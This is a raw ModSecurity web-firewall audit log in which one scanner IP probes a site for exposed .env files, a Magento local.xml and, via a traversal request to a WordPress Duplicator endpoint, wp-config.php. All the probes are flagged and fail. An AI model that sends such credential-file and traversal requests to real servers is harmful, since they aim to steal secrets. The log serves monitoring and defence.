gc=75967 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e0d7478-Z-- --fde8c777-A-- [17/Jun/2025:04:02:55.429909 +0530] aFCbllCTF37l_jAzt4oIdAAAAAU 198.55.98.236 48098 127.0.0.1 7081 --fde8c777-B-- GET /test/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --fde8c777-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --fde8c777-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/test/.env"] [unique_id "aFCbllCTF37l_jAzt4oIdAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113174965786 464210 (- - -) Stopwatch2: 1750113174965786 464210; combined=2055, p1=394, p2=1544, p3=0, p4=0, p5=116, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fde8c777-Z-- --304d5016-A-- [17/Jun/2025:04:02:56.766078 +0530] aFCbmFCTF37l_jAzt4oIdgAAAAU 198.55.98.236 48254 127.0.0.1 7081 --304d5016-B-- GET /demo/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --304d5016-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --304d5016-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/demo/.env"] [unique_id "aFCbmFCTF37l_jAzt4oIdgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113176316152 449992 (- - -) Stopwatch2: 1750113176316152 449992; combined=2185, p1=452, p2=1610, p3=0, p4=0, p5=123, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --304d5016-Z-- --7eb2ac43-A-- [17/Jun/2025:04:02:59.355139 +0530] aFCbmpVkCcfT-Z8NQYy6hAAAAAc 198.55.98.236 48556 127.0.0.1 7081 --7eb2ac43-B-- GET /local/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --7eb2ac43-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --7eb2ac43-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/local/.env"] [unique_id "aFCbmpVkCcfT-Z8NQYy6hAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113178928563 426667 (- - -) Stopwatch2: 1750113178928563 426667; combined=2034, p1=368, p2=1553, p3=0, p4=0, p5=113, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7eb2ac43-Z-- --fe20c078-A-- [17/Jun/2025:04:03:00.695307 +0530] aFCbnArsPejRtmHkrKLWRQAAAAE 198.55.98.236 48634 127.0.0.1 7081 --fe20c078-B-- GET /system/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --fe20c078-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --fe20c078-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/system/.env"] [unique_id "aFCbnArsPejRtmHkrKLWRQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113180233456 461924 (- - -) Stopwatch2: 1750113180233456 461924; combined=1822, p1=422, p2=1318, p3=0, p4=0, p5=82, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe20c078-Z-- --b6419700-A-- [17/Jun/2025:04:03:02.085296 +0530] aFCbnVJfblPUQiSn5r2HSQAAAAA 198.55.98.236 48814 127.0.0.1 7081 --b6419700-B-- GET /shop/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --b6419700-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --b6419700-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/shop/.env"] [unique_id "aFCbnVJfblPUQiSn5r2HSQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113181560649 524711 (- - -) Stopwatch2: 1750113181560649 524711; combined=2269, p1=487, p2=1679, p3=0, p4=0, p5=103, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6419700-Z-- --4c52505c-A-- [17/Jun/2025:04:03:03.393588 +0530] aFCbnlCTF37l_jAzt4oIgQAAAAU 198.55.98.236 48952 127.0.0.1 7081 --4c52505c-B-- GET /blog1/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --4c52505c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --4c52505c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/blog1/.env"] [unique_id "aFCbnlCTF37l_jAzt4oIgQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113182959609 434055 (- - -) Stopwatch2: 1750113182959609 434055; combined=2079, p1=373, p2=1597, p3=0, p4=0, p5=108, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c52505c-Z-- --803e717d-A-- [17/Jun/2025:04:03:04.795169 +0530] aFCboLp3uuKArZI2bI_svgAAAAg 198.55.98.236 49092 127.0.0.1 7081 --803e717d-B-- GET /site/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --803e717d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --803e717d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/site/.env"] [unique_id "aFCboLp3uuKArZI2bI_svgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113184350368 444875 (- - -) Stopwatch2: 1750113184350368 444875; combined=1762, p1=392, p2=1291, p3=0, p4=0, p5=79, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --803e717d-Z-- --10cb5a59-A-- [17/Jun/2025:04:03:06.194852 +0530] aFCboVCTF37l_jAzt4oIhAAAAAU 198.55.98.236 49306 127.0.0.1 7081 --10cb5a59-B-- GET /.env.dev HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --10cb5a59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --10cb5a59-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.dev"] [unique_id "aFCboVCTF37l_jAzt4oIhAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113185701246 493672 (- - -) Stopwatch2: 1750113185701246 493672; combined=1749, p1=305, p2=1333, p3=0, p4=0, p5=111, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10cb5a59-Z-- --2f725865-A-- [17/Jun/2025:04:03:07.558358 +0530] aFCbo1JfblPUQiSn5r2HTwAAAAA 198.55.98.236 49328 127.0.0.1 7081 --2f725865-B-- GET /home/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --2f725865-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --2f725865-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/home/.env"] [unique_id "aFCbo1JfblPUQiSn5r2HTwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113187106494 451969 (- - -) Stopwatch2: 1750113187106494 451969; combined=1755, p1=364, p2=1254, p3=0, p4=0, p5=136, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2f725865-Z-- --944d232a-A-- [17/Jun/2025:04:03:08.872075 +0530] aFCbpBwcFb_n1P0IC9yLMQAAAAo 198.55.98.236 49352 127.0.0.1 7081 --944d232a-B-- GET /web/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --944d232a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --944d232a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/web/.env"] [unique_id "aFCbpBwcFb_n1P0IC9yLMQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113188437634 434508 (- - -) Stopwatch2: 1750113188437634 434508; combined=2022, p1=425, p2=1478, p3=0, p4=0, p5=119, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --944d232a-Z-- --46e43813-A-- [17/Jun/2025:04:03:10.224789 +0530] aFCbpVCTF37l_jAzt4oIhQAAAAU 198.55.98.236 53946 127.0.0.1 7081 --46e43813-B-- GET /.env1 HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --46e43813-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --46e43813-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env1"] [unique_id "aFCbpVCTF37l_jAzt4oIhQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113189789659 435194 (- - -) Stopwatch2: 1750113189789659 435194; combined=2047, p1=390, p2=1545, p3=0, p4=0, p5=112, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46e43813-Z-- --ef343b73-A-- [17/Jun/2025:04:03:11.553444 +0530] aFCbp6RT9PYLci8mxb0jngAAAAM 198.55.98.236 53992 127.0.0.1 7081 --ef343b73-B-- GET /website/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --ef343b73-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --ef343b73-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/website/.env"] [unique_id "aFCbp6RT9PYLci8mxb0jngAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113191122424 431084 (- - -) Stopwatch2: 1750113191122424 431084; combined=1783, p1=382, p2=1281, p3=0, p4=0, p5=120, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef343b73-Z-- --ff19c917-A-- [17/Jun/2025:04:03:13.033813 +0530] aFCbqLp3uuKArZI2bI_swgAAAAg 198.55.98.236 54066 127.0.0.1 7081 --ff19c917-B-- GET /app/etc/local.xml HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --ff19c917-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --ff19c917-H-- Message: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/app/etc/local.xml"] [unique_id "aFCbqLp3uuKArZI2bI_swgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113192572347 461533 (- - -) Stopwatch2: 1750113192572347 461533; combined=1902, p1=358, p2=1414, p3=0, p4=0, p5=130, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ff19c917-Z-- --d75b6450-A-- [17/Jun/2025:04:03:13.946765 +0530] aFCbqaC450Yw050Ymr0b8gAAAAk 198.55.98.236 54108 127.0.0.1 7081 --d75b6450-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --d75b6450-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --d75b6450-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbqaC450Yw050Ymr0b8gAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbqaC450Yw050Ymr0b8gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113193873304 73539 (- - -) Stopwatch2: 1750113193873304 73539; combined=2448, p1=394, p2=1798, p3=88, p4=48, p5=120, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d75b6450-Z-- --9321f84c-A-- [17/Jun/2025:04:03:14.816206 +0530] 